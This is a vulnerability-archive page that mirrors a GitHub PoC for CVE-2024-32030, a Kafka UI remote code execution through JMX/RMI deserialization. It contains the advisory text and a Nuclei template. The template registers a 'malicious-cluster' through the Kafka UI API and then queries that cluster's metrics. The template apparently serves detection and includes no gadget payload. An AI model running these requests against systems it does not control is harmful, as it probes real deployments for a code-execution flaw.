Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-32030 PoC — Remote code execution via JNDI resolution in JMX metrics collection in Kafka UI

Source
https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template
Associated Vulnerability
Title:Remote code execution via JNDI resolution in JMX metrics collection in Kafka UI (CVE-2024-32030)
Description:Kafka UI is an Open-Source Web UI for Apache Kafka Management. Kafka UI API allows users to connect to different Kafka brokers by specifying their network address and port. As a separate feature, it also provides the ability to monitor the performance of Kafka brokers by connecting to their JMX ports. JMX is based on the RMI protocol, so it is inherently susceptible to deserialization attacks. A potential attacker can exploit this feature by connecting Kafka UI backend to its own malicious broker. This vulnerability affects the deployments where one of the following occurs: 1. dynamic.config.enabled property is set in settings. It's not enabled by default, but it's suggested to be enabled in many tutorials for Kafka UI, including its own README.md. OR 2. an attacker has access to the Kafka cluster that is being connected to Kafka UI. In this scenario the attacker can exploit this vulnerability to expand their access and execute code on Kafka UI as well. Instead of setting up a legitimate JMX port, an attacker can create an RMI listener that returns a malicious serialized object for any RMI call. In the worst case it could lead to remote code execution as Kafka UI has the required gadget chains in its classpath. This issue may lead to post-auth remote code execution. This is particularly dangerous as Kafka-UI does not have authentication enabled by default. This issue has been addressed in version 0.7.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. These issues were discovered and reported by the GitHub Security lab and is also tracked as GHSL-2023-230.
Readme

# CVE-2024-32030 Nuclei Template

## Description
This repository contains a Nuclei template for detecting the CVE-2024-32030 vulnerability. This vulnerability allows for remote code execution via JMX Metrics Collection JNDI Resolution.

## Vulnerability Details
- **ID:** CVE-2024-32030
- **Name:** JMX Metrics Collection JNDI RCE
- **Author:** Hüseyin TINTAŞ
- **Severity:** Critical
- **Description:** This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
- **Tags:** cve, cve2024, jmx, rce, cve2024-32030

## Template
```yaml
id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"
```

## Usage
To use this template, save it as `cve-2024-32030.yaml` and run it with Nuclei:
```sh
nuclei -t CVE-2024-32030.yaml -u http://target-server
```

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
File Snapshot

 [4.0K]  /data/pocs/afa78d54f9305e30e24e5d9816bbff833c14147c
├── [1.2K]  CVE-2024-32030.yaml
└── [2.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →